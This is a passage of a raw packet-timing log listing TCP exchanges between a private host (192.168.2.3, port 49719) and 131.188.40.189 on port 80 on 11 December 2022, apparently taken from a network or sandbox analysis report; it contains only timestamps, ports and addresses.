                          Dec 11, 2022 09:25:53.502809048 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.502820969 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.502851963 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.502862930 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.502907991 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.502913952 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.502957106 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.502970934 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.503001928 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.503010988 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.503043890 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.503056049 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.503088951 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.503103971 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.503134012 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.503146887 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.503181934 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.503201962 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.503226042 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.503235102 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.503268957 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.503283978 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.503313065 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.503324986 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.503355980 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.503366947 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.503398895 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.503412962 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.503443003 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.503452063 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.503485918 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.503495932 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.503530025 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.503542900 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.503585100 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.523473978 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.523529053 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.523617983 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.523617983 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.523663998 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.523703098 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.523726940 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.523741007 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.523755074 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.523799896 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.523884058 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.523922920 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.523950100 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.523966074 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.523988962 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.523992062 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.524030924 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.524030924 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.524050951 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.524070024 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.524087906 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.524107933 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.524127960 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.524147987 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.524167061 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.524185896 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.524203062 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.524224043 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.524244070 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.524280071 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.524291992 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.524318933 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.524344921 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.524383068 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.524421930 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.524456024 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.524456024 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.524458885 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.524497032 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.524533033 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.524534941 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.524570942 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.524575949 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.524595976 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.524609089 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.524620056 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.524648905 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.524665117 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.524688005 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.524699926 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.524725914 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.524741888 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.524765015 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.524780035 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.524801016 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.524815083 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.524940014 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.526797056 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.570410013 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.829087019 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.829215050 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.987570047 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.007613897 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.007663965 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.007698059 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.007731915 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.007762909 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.007764101 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.007795095 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.007823944 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.007827997 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.007860899 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.007879019 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.007893085 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.007925034 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.007957935 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.007966995 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.007988930 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008016109 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.008019924 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008055925 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008065939 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.008088112 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008120060 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008151054 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008157969 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.008184910 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008199930 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.008218050 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008250952 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008264065 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.008285999 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008317947 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008351088 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008353949 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.008383989 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008403063 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.008414984 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008450031 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008454084 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.008481979 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008514881 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008533001 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.008547068 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008579016 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008584976 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.008610964 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008642912 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008656025 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.008693933 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008704901 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008714914 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.008719921 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008745909 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008776903 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008795977 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.008807898 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008838892 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008851051 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.008879900 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008887053 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.008893967 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008925915 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008958101 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.008959055 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.009046078 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.029006004 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029056072 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029088020 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029120922 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029154062 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029197931 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029232979 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029266119 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029298067 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029331923 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029330015 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.029330015 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.029330015 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.029330015 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.029356956 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029382944 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029409885 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029433966 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029464960 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029501915 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029536963 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029567003 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029570103 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.029570103 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.029599905 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029632092 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029664040 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029685020 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.029685020 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.029699087 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029736996 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029769897 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029804945 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029830933 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.029830933 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.029836893 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029870987 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029901981 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029934883 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029937983 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.029959917 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.029985905 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.030018091 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.030050993 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.030083895 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.030118942 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.030143023 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.030143023 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.030143023 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.030149937 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.030179977 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.030183077 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.030216932 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.030246973 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.030278921 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.030299902 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.030313015 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.030345917 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.030371904 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.030381918 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.030415058 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.030435085 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.030451059 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.030483961 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.030489922 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.030518055 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.030550003 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.030599117 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.030647039 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.030664921 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.030664921 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.030690908 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.030734062 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.030738115 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.030777931 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.030807018 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.030821085 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.030864000 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.030893087 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.031120062 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.031167984 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.031209946 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.031210899 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.031253099 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.031282902 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.031295061 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.031337976 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.031377077 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.031380892 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.031424999 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.031455994 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.031469107 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.031513929 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.031544924 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.031557083 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.031600952 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.031630993 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.031642914 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.031685114 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.031714916 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.031728029 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.031770945 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.031807899 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.031812906 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.031857967 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.031889915 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.031900883 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.031943083 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.031974077 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.031985998 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.032028913 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.032063961 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.032074928 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.032116890 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.032150030 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.032160044 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.032205105 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.032238007 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.032248020 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.032291889 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.032325983 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.032335043 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.032377005 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.032418966 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.032422066 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.032491922 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.052602053 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.052670956 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.052716970 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.052762032 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.052804947 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.052849054 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.052850962 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.052850962 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.052892923 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.052936077 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.052978992 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.053045988 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.053056002 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.053059101 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.053056002 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.053087950 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.053138971 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.053170919 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.053170919 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.053184032 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.053226948 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.053272009 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.053301096 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.053307056 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.053307056 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.053347111 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.053391933 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.053436995 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.053468943 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.053479910 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.053525925 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.053567886 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.053601980 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.053617001 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.053679943 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.053685904 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.053745031 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.053792000 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.053816080 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.053836107 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.053879976 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.053905964 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.053925037 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.053967953 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.053997993 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.054012060 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.054059029 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.054085970 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.054101944 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.054146051 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.054172039 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.054192066 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.054236889 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.054260015 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.054285049 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.054342031 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.054367065 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.054393053 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.054436922 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.054478884 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.054507971 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.054522991 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.054567099 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.054599047 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.054610014 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.054653883 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.054708958 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.054727077 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:54.054753065 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:54.054790974 CET4971980192.168.2.3131.188.40.189
